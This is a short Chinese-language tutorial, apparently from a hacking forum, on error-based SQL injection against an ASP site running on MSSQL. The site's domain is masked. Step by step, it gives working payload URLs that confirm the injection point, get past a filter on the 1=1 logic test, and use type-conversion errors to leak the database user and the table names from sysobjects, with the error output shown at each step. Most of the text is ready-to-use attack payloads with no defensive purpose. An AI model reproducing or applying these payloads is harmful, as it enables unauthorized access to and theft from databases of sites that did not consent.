对于很多的MSSQL数据库,要进行注入需要灵活的技巧与思路,就有如在第一篇文章里所提到的逻辑判断法。 有时候,一个注入点的判断不是单纯靠and 1=1和and 1=2的,就有如这
网站:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25
加个" ' "符号在后面,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'
出错信息如下,
Unclosed quotation mark before the character string 'M10-25''
好,应该是注入点了,再试and 1=1,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='1
是正常画面,再试and 1=2,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='2
还是正常画面,看来是逻辑判断被过滤了,是不是不能注入了呢?然而,逻辑判断能被过滤,执行错误可不能被过滤。在unclosed quotation mark的前提下,我们先让它出错,然后再加个逻辑判断给它过滤和关掉那个" ' "符号。好,思路是这样,就提交这样的语句:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20user>0%20and%20'1'='1
出错信息如下,
Syntax error converting the nvarchar value 'dbo' to a column of data type int
看到吧,成功了。所以下次当逻辑判断被过滤了,就利用它再结合执行错误来进行注入好了。
再试这语句,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
出错信息是,
Syntax error converting the nvarchar value 'tUsers' to a column of data type int
好,第一个表名是'tUsers'
再来,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%202%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
这次的出错信息是,
Syntax error converting the nvarchar value 'tTechnical' to a column of data type int
第二个表名是'tTechnical'
好了,就试到这里为止。共勉之。